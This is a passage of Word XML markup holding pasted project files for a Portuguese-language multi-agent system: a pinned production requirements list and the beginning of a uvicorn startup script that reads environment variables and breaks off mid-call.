    <w:p w14:paraId="7A845EC2" w14:textId="27A90E90" w:rsidR="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fastapi&gt;=0.104.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744BC841" w14:textId="77777777" w:rsidR="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEC85EE" w14:textId="5420A43A" w:rsidR="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>requirements_production.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC91587" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUNA-ALSHAM Multi-Agent System - Production Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4BA56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Dependências otimizadas para produção com versões fixas para estabilidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04150D3B" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A9356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CORE FRAMEWORK =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14716C6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fastapi==0.104.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58A50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uvicorn[standard]==0.24.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BFCFD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pydantic==2.5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E94495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pydantic-settings==2.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CE3BDD" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DB5C0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ASYNC &amp; CONCURRENCY =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75669B6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asyncio-mqtt==0.16.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C65ED2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aiofiles==23.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48E14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aioredis==2.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF7BD2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websockets==12.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E20894F" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41409D7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AI &amp; MACHINE LEARNING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E61BD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openai==1.3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C82FF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numpy==1.24.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE4535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pandas==2.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085F320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scikit-learn==1.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F6AE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transformers==4.35.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584B50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torch==2.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F226FBE" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2725927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DATABASE &amp; CACHING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770627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redis==5.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7DCEB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sqlalchemy==2.0.23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6FFC6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alembic==1.12.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6932BE8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psycopg2-binary==2.9.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC51DD5" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571662D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HTTP &amp; NETWORKING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA087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httpx==0.25.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17830EC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requests==2.31.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DAAA7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urllib3==2.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA0CE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certifi==2023.11.17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D5E20" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F0964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SECURITY &amp; AUTHENTICATION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C181B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cryptography==41.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A79F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bcrypt==4.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7944BCF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python-jose[cryptography]==3.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D11FBD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passlib[bcrypt]==1.7.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F826A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python-multipart==0.0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF08912" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C769A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MONITORING &amp; LOGGING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D1E1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prometheus-client==0.19.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E7F37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structlog==23.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6474861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python-json-logger==2.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548A9A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sentry-sdk[fastapi]==1.38.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA10CDD" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50773FA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DATA PROCESSING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2649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jsonschema==4.20.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676A4DD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python-dateutil==2.8.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743958D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pytz==2023.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5713311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marshmallow==3.20.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164EFD53" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5914F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UTILITIES =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47855FC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python-dotenv==1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B93E3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click==8.1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7794E91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rich==13.7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C030F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typer==0.9.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362434F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pyyaml==6.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26101C5B" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531C8CE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TESTING (MINIMAL FOR PROD) =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0955419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pytest==7.4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C2445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pytest-asyncio==0.21.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C50C43" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7374187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WEB &amp; API =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB7AE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jinja2==3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07ACF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starlette==0.27.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382610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python-multipart==0.0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD154AF" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08AAA32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PERFORMANCE OPTIMIZATION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542DAE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orjson==3.9.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D3A1E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msgpack==1.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8308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lz4==4.3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969A72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cachetools==5.3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F0272" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4DC9E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DEPLOYMENT &amp; CONTAINERIZATION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C483BE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gunicorn==21.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2EC63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docker==6.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77EA59" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1666508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SCIENTIFIC COMPUTING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BBF4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scipy==1.11.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F55F32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matplotlib==3.8.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D78B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seaborn==0.13.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED70C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plotly==5.17.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530D64A1" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DA4D9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SYSTEM MONITORING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DEFF7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psutil==5.9.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFBEDE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py-cpuinfo==9.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E3413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GPUtil==1.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D49A395" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D158BB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NETWORKING &amp; PROTOCOLS =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D6CE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websocket-client==1.6.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7867C51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paho-mqtt==1.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFFED6D" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584436C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DATA VALIDATION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF560E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email-validator==2.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F927E9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phonenumbers==8.13.25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521035EF" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F1F70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TIMEZONE &amp; LOCALIZATION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279F96C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babel==2.13.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3067F6B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pytz==2023.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7144BE" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5766FA9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===== PRODUCTION OPTIMIZATIONS =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A7B32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Versões fixas para garantir estabilidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5091435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Pacotes otimizados para performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD0A4A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Dependências mínimas para reduzir tamanho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3249DB9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Compatibilidade com Docker e Railway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567ABF0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Suporte a Redis para cache distribuído</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF0A5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Monitoramento com Prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D9308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Logging estruturado para produção</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A37BEF8" w14:textId="2741106B" w:rsidR="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># Segurança enterprise com criptografia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04075C1E" w14:textId="77777777" w:rsidR="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CFA9DB5" w14:textId="4CF29EA8" w:rsidR="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>start.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DF6E1" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650504B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SUNA-ALSHAM Enterprise Startup Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C926DF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Script de inicialização para Railway com detecção automática de porta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6891913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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337DE2AC" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6DB09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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1C24A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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B6594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import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568AFCD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import uvicorn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13737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from pathlib import Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E426E01" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3583164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Adicionar diretório atual ao path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA433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sys.path.append(str(Path(__file__).parent))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF148E9" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1286C16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def get_port():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6589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"""Detecta a porta do Railway ou usa padrão"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C712B4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return int(os.environ.get("PORT", 8080))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C95139D" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1E2DF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def get_host():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D59AC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"""Detecta o host apropriado"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA03D9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return "0.0.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D673CE4" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C97E6D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async def startup_sequence():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7FDB8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"""Sequência de inicialização dos serviços"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561511C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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando SUNA-ALSHAM Enterprise...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157A2F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1A137C8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# Verificar variáveis de ambiente essenciais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789D139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openai_key = os.environ.get("OPENAI_API_KEY")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06922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if not openai_key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40223DE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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OPENAI_API_KEY não configurada - usando modo demo")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAECA2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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588DE2D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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OPENAI_API_KEY configurada")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5644B74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2539440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# Verificar Redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4148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redis_url = os.environ.get("REDIS_URL")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC3E07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if redis_url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B87579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print(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Redis configurado: {redis_url[:20]}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22387A0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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE122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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Redis não configurado - usando cache em memória")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFBDB3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4C16379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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sequ</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ê</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ncia de inicializa</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>da")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5F1E1B" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B12B68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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F0D57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"""Função principal de inicialização"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D395B0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4C668CB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# Executar sequência de startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1531FD1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asyncio.run(startup_sequence())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C7FBD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4814D9F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# Configurações do servidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FBC74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port = get_port()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7018DF1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host = get_host()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053419B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3ACBC56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print(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando servidor em {host}:{port}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3661735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53927F6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# Tentar importar o orquestrador principal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FB35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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF1D2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from main_orchestrator import app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0DCB6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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Orquestrador principal carregado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38426DF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6781745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# Configurações de produção</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C58549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uvicorn.run(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B206C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app,</w:t>
      </w:r>
    </w:p>
